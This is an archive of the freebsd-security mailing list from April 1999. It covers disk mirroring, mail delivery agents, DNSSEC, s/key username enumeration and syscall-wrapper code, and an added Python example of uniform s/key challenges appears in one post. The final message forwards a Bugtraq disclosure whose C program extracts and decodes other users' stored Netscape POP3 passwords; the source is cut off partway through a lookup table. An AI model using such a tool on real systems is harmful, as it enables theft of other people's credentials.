> possibility of a disk failure. I have heard that there is a new
> mirroring facility in 3.x, but my firewall machines are all running
> 2.2.x.

Which is this facility? I want to set up a mirror disk for my mail/web server but have no clue about it.
When I search the FreeBSD site for mirroring I only get the freebsd.org site mirroring isntructions :-( To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 11:19:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP id 36F6314C10 for ; Wed, 7 Apr 1999 11:19:52 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id OAA00659; Wed, 7 Apr 1999 14:17:47 -0400 (EDT) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14091.41290.616792.926953@trooper.velocet.ca> Date: Wed, 7 Apr 1999 14:17:46 -0400 (EDT) To: Kenneth Ingham Cc: GuangChun Wen , freebsd-security@FreeBSD.ORG Subject: Re: Cluster service in FreeBSD In-Reply-To: <19990407084054.D1562@socrates.i-pi.com> References: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp> <19990407084054.D1562@socrates.i-pi.com> X-Mailer: VM 6.62 under Emacs 19.34.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "Kenneth" == Kenneth Ingham writes: Kenneth> The biggest problem I have had is on a mail server with Kenneth> procmail as a local delivery agent. Procmail wants to have Kenneth> the whole message in memory at once, and people at one of my Kenneth> sites have no concept of file size or transmission time (over Kenneth> 56KB lines), so emailing 50MB documents is a somewhat common Kenneth> event. With a 16MB P120, swap space is a requirement. I Kenneth> added an old 400MB disk as swap space and solved the problem. This is quite a problem. At one of my sites, I had occaision that 10-20 multi-megabyte deliveries would occur simultaniously. 
If you're using procmail, your only choice at that point is more RAM --- which has led me to be procmail shy on my production machines. Mail's only going to get bigger. Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 11:42:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from isr3277.urh.uiuc.edu (isr3277.urh.uiuc.edu [130.126.65.13]) by hub.freebsd.org (Postfix) with SMTP id D0D1B1512E for ; Wed, 7 Apr 1999 11:42:16 -0700 (PDT) (envelope-from ftobin@bigfoot.com) Received: (qmail 30584 invoked by uid 1000); 7 Apr 1999 18:40:16 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 7 Apr 1999 18:40:16 -0000 Date: Wed, 7 Apr 1999 13:40:15 -0500 (CDT) From: Frank Tobin X-Sender: ftobin@isr3277.urh.uiuc.edu Cc: FreeBSD-security Mailing List Subject: Re: Cluster service in FreeBSD In-Reply-To: <14091.41290.616792.926953@trooper.velocet.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David Gilbert, on Wed, 7 Apr 1999, wrote: > This is quite a problem. At one of my sites, I had occaision that > 10-20 multi-megabyte deliveries would occur simultaniously. If you're > using procmail, your only choice at that point is more RAM --- which > has led me to be procmail shy on my production machines. Mail's only > going to get bigger. If I'm not mistaken, maildrop ( ports/mail/maildrop ), is a replacement for procmail, and would solve your problem. 
It is specifically stated in its description that:

    maildrop is written in C++, and is significantly larger than
    procmail, in compiled form. However, it uses resources much more
    efficiently. Unlike procmail, maildrop will not read a 10 megabyte
    mail message into memory. Large messages are saved in a temporary
    file, and are filtered from that file.

-- 
Frank Tobin                      "To learn what is good and what is to be
http://www.bigfoot.com/~ftobin    valued, those truths which cannot be
                                  shaken or changed."  Myst: The Book of Atrus

FreeBSD: The Power To Serve
PGPenvelope = Pine + PGP 5.0(i)
PGP: 1502 6E84 8C08 E828 7945  3F4A 02F8 503A F40E B65E
http://www.bigfoot.com/~ftobin/resources

From owner-freebsd-security Wed Apr 7 11:55:35 1999
Date: Wed, 7 Apr 1999 18:53:58 +0100
From: Tom Hukins
To: Kenneth Ingham, "Rafael A. Reta Rodriguez"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Cluster service in FreeBSD
Message-ID: <19990407185357.B15987@eborcom.com>
In-Reply-To: <19990407084054.D1562@socrates.i-pi.com>; from Kenneth Ingham on Wed, Apr 07, 1999 at 08:40:54AM -0600

On Wed, Apr 07, 1999 at 10:52:25AM -0600, Rafael A. Reta Rodriguez wrote:
> 
> Kenneth Ingham wrote:
> 
> > I have heard that there is a new
> > mirroring facility in 3.x, but my firewall machines are all running
> > 2.2.x.
> 
> Which is this facility? I want to set up a mirror disk for my mail/web server
> but have no clue about it. When I search the FreeBSD site for mirroring I only
> get the freebsd.org site mirroring instructions :-(

It's called Vinum.

> > The biggest problem I have had is on a mail server with procmail as a
> > local delivery agent. Procmail wants to have the whole message in memory

You could always use Maildrop (/usr/ports/mail/maildrop) instead.
Regards,
Tom

From owner-freebsd-security Wed Apr 7 16:46:24 1999
Date: Thu, 8 Apr 1999 09:14:32 +0930 (CST)
From: Kris Kennaway
To: Frank Tobin
Cc: FreeBSD-security Mailing List
Subject: Re: Cluster service in FreeBSD

On Wed, 7 Apr 1999, Frank Tobin wrote:

> If I'm not mistaken, maildrop (ports/mail/maildrop) is a replacement
> for procmail, and would solve your problem. It is specifically stated in
> its description that:

Heh. I accidentally broke the maildrop port last night during a bad commit
while attempting to upgrade the port to a newer version. It'll be fixed in
about 12 hours..

Kris

-----
The Feynman problem-solving algorithm:
1. Write down the problem
2. Think real hard
3. Write down the solution

From owner-freebsd-security Thu Apr 8 2:37:57 1999
Date: Thu, 8 Apr 1999 10:31:20 +0100
From: "Grant Beckerleg"
Subject: ssh and scp
Message-ID: <007801be81a2$8f98e680$0602cfc2@gromit.uk1.vbc.net>

Hello people,

I am very new to FreeBSD and I have been asked to investigate some security
issues. I am not sure if this is FreeBSD specific or a general OS question so
please bear with me.

I use ssh to securely login to remote machines and I am looking into secure
transfer of DNS database records between nameservers. I intend to use Secure
Copy Program for transfer between company nameservers but I am unsure of the
best method to tackle the transfer of our customers' DNS stuff to our
nameserver. Using anonymous ftp would compromise the customers' security but
I do not know the best solution.

Could someone point me in the right direction, please?
Rgds,

Grant Beckerleg
VBCnet GB Ltd
http://www.vbc.net
tel +44 117 929 1316
fax +44 117 927 2015

From owner-freebsd-security Thu Apr 8 2:40:25 1999
Date: Thu, 8 Apr 1999 19:06:09 +0930 (CST)
From: Mark Newton
To: grant@vbc.net (Grant Beckerleg)
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ssh and scp
Message-Id: <199904080936.TAA11475@atdot.dotat.org>
In-Reply-To: <007801be81a2$8f98e680$0602cfc2@gromit.uk1.vbc.net> from "Grant Beckerleg" at Apr 8, 99 10:31:20 am

Grant Beckerleg wrote:

> I am very new to FreeBSD and I have been asked
> to investigate some security issues. I am not sure if this is FreeBSD
> specific or a general OS question so please bear with me.
> I use ssh to securely login to remote machines and I am looking into
> secure transfer of DNS database records between nameservers.

Maybe I'm missing something, but isn't that what zone transfers are for?

  - mark

--------------------------------------------------------------------
I tried an internal modem,                    newton@atdot.dotat.org
but it hurt when I walked.
                                                         Mark Newton
----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 -----

From owner-freebsd-security Thu Apr 8 2:54:06 1999
Date: Thu, 8 Apr 1999 10:51:45 +0100
From: Jay Tribick
To: freebsd-security@freebsd.org
Subject: Re: ssh and scp
Message-ID: <19990408105145.J2213@bofh.fastnet.co.uk>
In-Reply-To: <199904080936.TAA11475@atdot.dotat.org>; "Mark Newton" on 08.04.1999 @ 10:36:09 BST

Hi

> > I am very new to FreeBSD and I have been asked
> > to investigate some security issues. I am not sure if this is FreeBSD
> > specific or a general OS question so please bear with me.
> > I use ssh to securely login to remote machines and I am looking into
> > secure transfer of DNS database records between nameservers.
> 
> Maybe I'm missing something, but isn't that what zone transfers
> are for?

Yeh but he's probably looking for something that's encrypted - you could try
the new DNSSEC betas (www.toad.com/~dnssec), but AFAIK they just sign the
zone files and don't actually encrypt them over the link.

Other than that, set them both up as being 'masters' and just scp the zone
files over every few [hours].
-- 
Regards,

Jay Tribick

[| Network Admin | FastNet International | http://fast.net.uk/ |]
[| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |]
[| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |]

From owner-freebsd-security Thu Apr 8 3:01:01 1999
Date: Thu, 08 Apr 1999 11:58:56 +0200
From: sthaug@nethelp.no
To: netadmin@fastnet.co.uk
Cc: freebsd-security@freebsd.org
Subject: Re: ssh and scp
Message-ID: <84016.923565536@verdi.nethelp.no>
In-Reply-To: Your message of "Thu, 8 Apr 1999 10:51:45 +0100"

> > Maybe I'm missing something, but isn't that what zone transfers
> > are for?
> 
> Yeh but he's probably looking for something that's encrypted -
> you could try the new DNSSEC betas (www.toad.com/~dnssec), but
> AFAIK they just sign the zone files and don't actually encrypt
> them over the link.

Note that:

1. BIND 8.2 already supports (part of) DNSSEC.
2. But there are known bugs in the 8.2 implementation which can give
   you crashes if it's used. An unofficial patch is available.
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Thu Apr 8 3:02:01 1999
Date: Thu, 8 Apr 1999 10:59:56 +0100
From: Jay Tribick
To: freebsd-security@freebsd.org
Subject: Re: ssh and scp
Message-ID: <19990408105956.M2213@bofh.fastnet.co.uk>
In-Reply-To: <84016.923565536@verdi.nethelp.no>; "sthaug@nethelp.no" on 08.04.1999 @ 10:58:56 BST

Hi

> > > Maybe I'm missing something, but isn't that what zone transfers
> > > are for?
> > 
> > Yeh but he's probably looking for something that's encrypted -
> > you could try the new DNSSEC betas (www.toad.com/~dnssec), but
> > AFAIK they just sign the zone files and don't actually encrypt
> > them over the link.
> 
> Note that:
> 
> 1. BIND 8.2 already supports (part of) DNSSEC.
> 2. But there are known bugs in the 8.2 implementation which can give
>    you crashes if it's used. An unofficial patch is available.

Am I right in thinking that it doesn't encrypt the transfer, just signs it so
that it can be authenticated?
-- 
Regards,

Jay Tribick

[| Network Admin | FastNet International | http://fast.net.uk/ |]
[| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |]
[| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |]

From owner-freebsd-security Thu Apr 8 3:34:25 1999
Date: Thu, 08 Apr 1999 12:32:22 +0200
From: sthaug@nethelp.no
To: netadmin@fastnet.co.uk
Cc: freebsd-security@freebsd.org
Subject: Re: ssh and scp
Message-ID: <85141.923567542@verdi.nethelp.no>
In-Reply-To: Your message of "Thu, 8 Apr 1999 10:59:56 +0100"

> > Note that:
> > 
> > 1. BIND 8.2 already supports (part of) DNSSEC.
> > 2. But there are known bugs in the 8.2 implementation which can give
> >    you crashes if it's used. An unofficial patch is available.
> 
> Am I right in thinking that it doesn't encrypt the transfer,
> just signs it so that it can be authenticated?

Yup. From RFC 2065:

    2. Overview of the DNS Extensions

    The Domain Name System (DNS) protocol security extensions provide
    three distinct services: key distribution as described in Section
    2.2 below, data origin authentication as described in Section 2.3
    below, and transaction and request authentication, described in
    Section 2.4 below. Special considerations related to "time to
    live", CNAMEs, and delegation points are also discussed in Section
    2.3.
    2.1 Services Not Provided

    It is part of the design philosophy of the DNS that the data in it
    is public and that the DNS gives the same answers to all inquirers.
    Following this philosophy, no attempt has been made to include any
    sort of access control lists or other means to differentiate
    inquirers.

    In addition, no effort has been made to provide for any
    confidentiality for queries or responses. (This service may be
    available via IPSEC [RFC 1825].)

So it explicitly does not provide confidentiality.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Thu Apr 8 4:46:38 1999
Date: Thu, 8 Apr 1999 07:44:17 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Jay Tribick
Cc: freebsd-security@freebsd.org
Subject: Re: ssh and scp
In-Reply-To: <19990408105956.M2213@bofh.fastnet.co.uk>

On Thu, 8 Apr 1999, Jay Tribick wrote:

> > 1. BIND 8.2 already supports (part of) DNSSEC.
> > 2. But there are known bugs in the 8.2 implementation which can give
> >    you crashes if it's used. An unofficial patch is available.
> 
> Am I right in thinking that it doesn't encrypt the transfer,
> just signs it so that it can be authenticated?
This is intentional--DNS is not intended to provide privacy, in this case only
integrity and authenticity. While BIND supports some access control on the
release of full zones currently, the fundamental design as a public name
service makes that only a secondary goal. This is especially the case if you
look at DNSSEC NXT support -- that is, the authenticable denial that a
particular name exists. This is done by having signed records that describe
the gaps between legitimate records (i.e., a record that says, the next record
in the zone is named blah.blah.blah). A technique named NXT-walking is
described, in which an attacker can retrieve a well-known record in the zone,
and then walk down the zone using the NXT records to retrieve all the other
names. There was some talk of changing the NXT records to use a one-way hash
of some kind on the second name, but I haven't followed DNSSEC closely in a
number of months (too many RFCs, too little time).

DNSSEC has enormous potential; now if only we can prevent DNS politics from
screwing it up. It can provide a public key infrastructure bound to a
well-known naming scheme; for example, you can stuff web server and SSH keys
into zones, and be able to walk securely down the DNS hierarchy in the style
of a certificate hierarchy. And of course, there is that problem of the root
key...

  Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73  25 6D 10 FC EC 68 C1 1C
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Thu Apr 8 5:16:07 1999
Date: Thu, 08 Apr 1999 16:20:01 +0400
From: "Serguei V. Melekhov"
Reply-To: smelekov@vniigazmain.gazprom.ru
To: "freebsd-security@FreeBSD.ORG"
Subject: /Kernel Calcru
Message-ID: <370C9EF1.AD0BDAB@vniigazmain.gazprom.ru>

Hello,

Sorry for the dumb question. I just don't know what this means:

  Apr 8 09:09:09 mail /kernel: calcru: negative time: -478 usec

Anyway, time plays no role here. Just this kernel calcru message?!

Thanks in advance.

-- 
Yours,
Serguei V. Melekhov
System Administrator of International Relations And Information Division
All-Russian Scientific Research Institute of Natural Gases and Gas Technologies
Tel.
(095) 355-9165
Fax: (095) 399-1677

From owner-freebsd-security Thu Apr 8 10:27:20 1999
Date: Thu, 8 Apr 1999 13:24:50 -0400
From: Jared Mauch
To: "Serguei V. Melekhov"
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: /Kernel Calcru
Message-ID: <19990408132450.J11653@puck.nether.net>
In-Reply-To: <370C9EF1.AD0BDAB@vniigazmain.gazprom.ru>; from Serguei V. Melekhov on Thu, Apr 08, 1999 at 04:20:01PM +0400

It's a calculation of cpu time the process has used. Somewhere there was a
math error, causing a negative time to appear. I get thousands of these on
some of my servers, e.g.:

  calcru: negative time of -12177441 usec for pid 1420 (cucipop)

etc.. I've not seen it be of any harm, but it may be somehow that I'm not
aware of.

On Thu, Apr 08, 1999 at 04:20:01PM +0400, Serguei V. Melekhov wrote:
> Hello,
> Sorry for the dumb question. Just don't know what does that mean?
> Apr 8 09:09:09 mail /kernel: calcru: negative time: -478 usec
> Anyway, Time plays no role here. Just this kernel calcru message?!
> 
> Thanks in advance.

-- 
Jared Mauch  | pgp key available via finger from jared@puck.nether.net
clue++;      | http://puck.nether.net/~jared/  My statements are only mine.
From owner-freebsd-security Thu Apr 8 10:37:27 1999
Date: Thu, 08 Apr 1999 14:28:20 -0300
From: Lauro Barbosa
To: freebsd-security@freebsd.org
Subject: FreeBSD 2.2.8 and DES (again)
Message-ID: <370CE733.C1C578E3@pro.via-rs.com.br>

Hello Again!

Please, I need help. I have a server with FreeBSD 2.2.8 and DES installed. On
this server the users can log in using either login_name or login_name. (with
a dot at the end), for example: john or john.

Does anybody know about this problem? How can it be corrected?

Sorry for my poor English.

Thanks,
Lauro.
From owner-freebsd-security Thu Apr 8 12:22:55 1999
Date: Thu, 8 Apr 1999 15:20:42 -0400 (EDT)
From: Daniel Hagan
To: FreeBsd-security@freebsd.org
Subject: Login & s/key brain damage?

On a FreeBSD-3.1-Release system, I've configured the following in
/etc/skey.access

----->8-----
permit group wheel internet (my network) (my netmask)
# Force everyone to login with skey.
deny
----->8-----

This seems to work just as advertised, except for one thing: Logging in with
an invalid username results in an immediate error message while valid accounts
proceed to the password prompt:

----->8-----
%telnet localhost
Trying 127.0.0.1...
Connected to localhost.cs.vt.edu.
Escape character is '^]'.

FreeBSD/i386 (myhost.cs.vt.edu) (ttyp2)

login: bozo
Login incorrect
login: root
s/key 94 po93853
Password:
----->8-----

It seems to me that a more correct behavior would be to always present a
(possibly random) skey challenge, and only reject the login after they try a
password. This current situation seems to present an easy way of id-ing
userids on a system that someone wants secure. Is this correct behavior, or
should we think about modifying login(1)?
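The "always present a challenge" behaviour Daniel asks for, as an added example in Python that is not part of the original post or of FreeBSD's login(1). One refinement over a purely random challenge: a real user's s/key challenge stays the same until they log in, so a challenge that changes on every attempt would itself mark the account as non-existent; the fake one is therefore derived deterministically from a per-host secret and the username. The skeykeys record layout, the host secret and the usernames are constructed assumptions.

```python
"""Uniform s/key challenges for unknown users (added example)."""
import hashlib
import hmac
import re

# Constructed sample of a /etc/skeykeys-style file. Assumption: one record
# per line, "user sequence seed hash date time"; only the first three
# fields matter here.
SAMPLE_SKEYKEYS = """\
root 94 po93853 3b0ce1d0ef2e4c18 Apr 07,1999 10:11:12
alice 57 al10442 91f2a3b4c5d6e7f8 Apr 01,1999 09:00:00
"""

# Shape of the prompt shown in Daniel's transcript: "s/key 94 po93853".
CHALLENGE_RE = re.compile(r"^s/key (\d{1,3}) ([a-z]{2}\d{5})$")


def load_skeykeys(text):
    """Parse the sample keyfile into {user: (sequence, seed)}."""
    records = {}
    for line in text.splitlines():
        if line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 3:
            continue
        records[fields[0]] = (int(fields[1]), fields[2])
    return records


def fake_challenge(username, host_secret):
    """Deterministic, plausible-looking challenge for a non-existent user.

    HMAC over the username with a per-host secret keeps the output stable
    across attempts (as a real user's would be) and unpredictable to anyone
    without the secret, so the prompt gives away nothing either way.
    """
    digest = hmac.new(host_secret, username.encode(), hashlib.sha256).digest()
    # Real sequence numbers count down from 99; stay in the same range.
    seq = 1 + digest[0] % 99
    # Seed shape mirrors the real ones: two letters plus five digits.
    letters = "abcdefghijklmnopqrstuvwxyz"
    seed = (letters[digest[1] % 26] + letters[digest[2] % 26]
            + "%05d" % (int.from_bytes(digest[3:7], "big") % 100000))
    return "s/key %d %s" % (seq, seed)


def challenge_for(username, records, host_secret):
    """Return the prompt line for any username, real or not.

    Both branches produce the same format, so the prompt alone no longer
    says whether the account exists; rejection happens only after the
    response is checked.
    """
    if username in records:
        seq, seed = records[username]
        return "s/key %d %s" % (seq, seed)
    return fake_challenge(username, host_secret)


if __name__ == "__main__":
    recs = load_skeykeys(SAMPLE_SKEYKEYS)
    secret = b"constructed-per-host-secret"
    for user in ("root", "bozo"):
        print("login: %s -> %s" % (user, challenge_for(user, recs, secret)))
```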
Daniel

-- 
Daniel Hagan
Computer Systems Engineer
dhagan@cs.vt.edu

From owner-freebsd-security Thu Apr 8 14:20:38 1999
Date: Thu, 08 Apr 1999 17:17:35 -0400
From: Mark S Feldman
To: freebsd-security@freebsd.org
Cc: feldman@tislabs.com
Subject: Generic Software Wrappers
Message-Id: <199904082117.RAA13119@clipper.gw.tislabs.com>

Almost 8 months back, I responded to a message on this list and described a
research project we were working on. My message is below. At the end of the
message, I said I would send another message to this list when we made our
source available.

Well, the first release of our Generic Software Wrappers Tool Kit -- still
very much a research prototype -- is available. It runs under FreeBSD 2.2.x,
Solaris 2.6, and, as much as we have ported to date, under Windows NT 4.0.
We're limited to FreeBSD 2.2.x because we don't currently have the resources
to port to 3.x.

Check out ftp://ftp.tislabs.com/pub/wrappers if you're interested.
Mark

------- Forwarded Message

To: Philippe Regnauld
cc: freebsd-security@freebsd.org, badger@tis.com, feldman@tis.com,
    Robert Watson
Subject: Re: Fwd: "Using capabilties aaginst shell code" (fwd)
Date: Wed, 19 Aug 1998 11:14:17 -0400
From: Mark S Feldman

Philippe,

Your message to the freebsd-security list was passed to me. I'm the project
leader for the Generic Software Wrappers project at TIS Labs at Network
Associates. In short, under DARPA contract F30602-96-C-0333, we have developed
a Wrapper Definition Language (WDL) based on 'C' which makes it easy to
identify system events of interest (e.g., named system calls, all system calls
containing a path parameter, system calls available only to root), to
intercept them, and to deny, augment, or transform those events. We have
developed a prototype under FreeBSD, including a wrapper compiler which
compiles WDL into 'C', a Wrapper Support Subsystem implemented as a Loadable
Kernel Module, and various support programs. We are currently porting to
Solaris and Windows NT. Our source is not currently organized for
distribution, but, once it is, it will be made available for free for
non-commercial use.

> Is this any form of restriction that can be implemented
> in *BSD systems ? I.e.: restricting system calls to
> certain classes of daemons ?

One of our simpler wrappers is the noadmin wrapper, which prevents a wrapped
process, even one running as root, from executing certain administrative
system calls:

/*
 * $Id: noadmin.wr,v 1.5 1998/04/20 19:05:08 ko Exp $
 *
 * noadmin.wr
 *
 * A wrapper that denies certain administrative syscalls.
 */

#include "../../wr.include/bsd.ch"

wrapper noadmin {
    bsd::op{mount || unmount || ptrace || quotactl || acct || swapon ||
            mknod || adjtime || ktrace || reboot || settimeofday} pre {
        return WR_DENY | WR_BADPERM;
    };
}

In the wrapper, bsd.ch contains a characterization of the system API. It
starts with the 'C' prototype, and then adds additional attributes that make
it possible to group system calls and to deal with their parameters. The
wrapper runs in the bsd domain and looks for the named operations. It
intercepts before the operation occurs (pre keyword), prevents it from
executing, making it appear to be a permission denied-type error.

> As mentioned in the example below, why should POPd be allowed
> to exec() ? This seems like a very sane approach (of course,
> it implies knowledge/auditing of the code).

In addition to our wrappers, which specify what events to look for and how to
handle them, we have activation criteria, which determine which wrappers wrap
a process. Activation criteria are simple boolean expressions which can be
based on the uid, gid, program name, etc. If the pop daemon were named popd,
the following activation criteria would cause it to be wrapped by the noadmin
wrapper:

    prog == popd ==> noadmin

As for not knowing what system calls a process needs to get the job done, it
could first be run under a wrapper like dbcallcount, which tracks all system
calls made by wrapped processes and uses Wrapper Query Language (WQL) to store
call counts in our fast, lightweight database which can be viewed using our
GUI or CLI from user space:

/*
 * $Id: dbcallcount.wr,v 1.7 1998/08/06 19:45:17 ko Exp $
 *
 * dbcallcount.wr
 *
 * This wrapper keeps track of the number of times each syscall is
 * attempted.
 *
 * Use the "wrselect" program to view the tables created.
 *
 */

#include "../../wr.include/bsd.ch"
#include "../../wr.include/libwr.h"

wrapper dbcallcount {
    DBTABLE callcountTable {
        char(20) key name;
        int count;
    };
    callcountTable callcount;

    wr_activate() {
        int i;

        /* create the table. */
        i = wql { create table callcount; };
        if (i < 0)
            wr_printf("Error creating table.\n");
    }

    wr_duplicate() {
        /* create the table. */
        wql { create table callcount; };
    }

    wr_deactivate() {
        /* Drop the table. */
        wql { drop table callcount; };
    }

    /* Catch all syscalls */
    bsd::op{*} pre {
        int retVal;

        /* If syscall is in the db, increment count. */
        /* If not, add the syscall to the database. */
        retVal = wql { update callcount set .count = .count + 1
                       where .name = $$; };
        if (retVal <= 0) {
            wql { insert into callcount values ($$, 1); };
        }
    };
}

> Then we could have certain untrusted (i.e.: running as
> root) daemons launched in such an environment, on top
> of being chroot()ed. ...

Yup. And wrappers provide a mechanism to do that. Take a look at the following
wrapper which creates a simple, if silly, synthetic environment:

/*
 * $Id: dbsynthetic.wr,v 1.5 1998/08/19 15:30:08 feldman Exp $
 *
 * This wrapper provides a synthetic environment, doing string
 * substitutions on path names.
 *
 */

#include "../../wr.include/bsd.ch"
#include "../../wr.include/libwr.h"

wrapper dbsynthetic {
    /* Null-terminated array of substitution string pairs. Each target
     * entry, if found in a path, will be replaced by the replacement
     * entry. Regular expressions, as defined in WDL, can be used for
     * the targets. */
    DBTABLE path_table {
        char(256) target;
        char(256) replacement;
    };
    DBTABLE alert_table {
        char(256) path;
        char(256) fullname;
        int pid;
        int uid;
    };
    path_table global pathnames;
    alert_table global alerts;

    wr_install() {
        DBROW::path_table row;

        wql {
            create table pathnames;
            create table alerts;
            insert into pathnames values
                ("/etc/master.passwd", "/etc/passwd"),
                ("/kernel", "/etc/motd"),
                ("/lkm", "/tmp"),
                ("/usr/games", "/usr/bin"),
                ("/usr/tmp", "/tmp"),
                ("/var/tmp", "/tmp");
            select into row from pathnames;
        };
    }

    wr_uninstall() {
        wql {
            drop table pathnames;
            drop table alerts;
        };
    }

    /* Intercept all syscalls containing paths before they run */
    bsd::pattr{path} pre {
        DBROW::path_table row;
        string fullname;
        int changed = 0;

        /* Attempt to convert path from relative to absolute. If
         * the conversion doesn't succeed, it's a bad path. This
         * would normally be the end, but since we may be
         * redirecting from a non-existent path to one that exists,
         * we'll proceed */
        if ((fullname = wr_abspath($path)) == NULL) {
            fullname = wr_strdup($path);
        }

        wql { select into row from pathnames; };
        do {
            /* Do string substitutions for each pair of pathnames
             * and remember if any occurred. */
            if (fullname =~ s|row.target|row.replacement|)
                changed++;
        } while (row.next());

        /* Write out an alert to the database and change the path
         * parameter if any substitutions occurred. */
        if (changed) {
            wql { insert into alerts values ($path, fullname, _pid, _uid); };
            $path = fullname;
        }

        /* Cleanup */
        wr_free(fullname);
    };
}

My response is undoubtedly way too long. I'll make sure that a message is sent
to this list when we make our source available. In the meantime, if you have
any questions, let me know.

Mark

- -----
Mark S. Feldman                       TIS Labs at Network Associates, Inc.
phone: +1 301 854 6889                3060 Washington Road
fax:   +1 301 854 5363                Glenwood, Maryland 21738

------- End of Forwarded Message

From owner-freebsd-security Thu Apr 8 17:31:01 1999
Date: Fri, 9 Apr 1999 10:26:24 +1000 (EST)
From: Bruce Campbell
To: Mark Newton
Cc: Grant Beckerleg, freebsd-security@FreeBSD.ORG
Subject: Re: ssh and scp
In-Reply-To: <199904080936.TAA11475@atdot.dotat.org>
MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 8 Apr 1999, Mark Newton wrote: > Grant Beckerleg wrote: > > > I am very new to FreeBSD and I have been asked > > to investigate some security issues. I am not sure if this is FreeBSD > > specific or a general OS question so please bear with me. > > I use ssh to securely login to remote machines and I am looking into > > secure transfer of DNS database records between nameservers. > > Maybe I'm missing something, but isn't that what zone transfers > are for? Yes and no. Sure, if you've got a clear path between the two machines, zone transfers, using BIND 8* features to tell the other nominated nameservers when a change of a zone occurs, it works. If you operate a vaguely more secure network, or you are just paranoid about equipment failures, your master zone files are maintained behind a firewall, and then ssh (rsync specifically)'d out to your external nameserver. Works for me, although I'll admit to being a bit shy of null-password RSA keys, which can be alleviated somewhat by restricting which hosts can use which keys. --==-- Bruce. 
host -t txt rcs.203.in-addr.arpa

From owner-freebsd-security Thu Apr 8 17:57:33 1999
Delivered-To: freebsd-security@freebsd.org
Received: from news.ks.edu.tw (news.ks.edu.tw [163.16.1.11]) by hub.freebsd.org (Postfix) with ESMTP id 0637F158CA for ; Thu, 8 Apr 1999 17:57:11 -0700 (PDT) (envelope-from foxfair@news.ks.edu.tw)
Received: from foxfair (tnt-58.ks.edu.tw [163.16.5.117]) by news.ks.edu.tw (8.9.3/8.9.2) with SMTP id IAA72854 for ; Fri, 9 Apr 1999 08:45:13 +0800 (CST) (envelope-from foxfair@news.ks.edu.tw)
Date: Fri, 09 Apr 1999 09:01:33 +0800
From: Foxfair Hu
To: freebsd-security@freebsd.org
Subject: Fw: Netscape 4.5 vulnerability
Message-Id: <370D516D2EE.C14EFOXFAIR@news.ks.edu.tw>
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver 1.24
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Forwarded by Foxfair Hu
---------------- Original message follows ----------------
From: Alexey Pavlov
To: BUGTRAQ@netspace.org
Date: Thu, 8 Apr 1999 21:12:27 +0400
Subject: Netscape 4.5 vulnerability
--

I found a method to get users' passwords from the Netscape 4.5 for FreeBSD ~user/.netscape/liprefs.js file. This file is used for storing the user's last session preferences. This file also contains the encrypted password for pop3. Unlike DES, this encryption can be decrypted. As a result of many experiments I wrote this program. It gives me almost all passwords on my system, because all people use Netscape.

Here is the source of this decryption program:

-----------------BEGIN CUT HERE-------------
/*****************************************************
This program is designed to extract and decode the Netscape email password.
This program is really very go-o-o-od!!
Programming by Lesha (c)1999
*****************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <pwd.h>

unsigned char Tbl_1[]={
'A','B','C','D','E','F','G','H','I','J','K',
'L','M','N','O','P','Q','R','S','T','U','V',
'W','X','Y','Z','a','b','c','d','e','f','g',
'h','i','j','k','l','m','n','o','p','q','r',
's','t','u','v','w','x','y','z','0','1','2',
'3','4','5','6','7','8','9','+','/','='
};

unsigned char Tbl_2[96][8]={
{0x76,0xe9,0xcf,0x6a,0xbb,0x9e,0x7a,0x62},
{0x77,0xe8,0xce,0x6b,0xba,0x9f,0x7b,0x63},
{0x74,0xeb,0xcd,0x68,0xb9,0x9c,0x78,0x60},
{0x75,0xea,0xcc,0x69,0xb8,0x9d,0x79,0x61},
{0x72,0xed,0xcb,0x6e,0xbf,0x9a,0x7e,0x66},
{0x73,0xec,0xca,0x6f,0xbe,0x9b,0x7f,0x67},
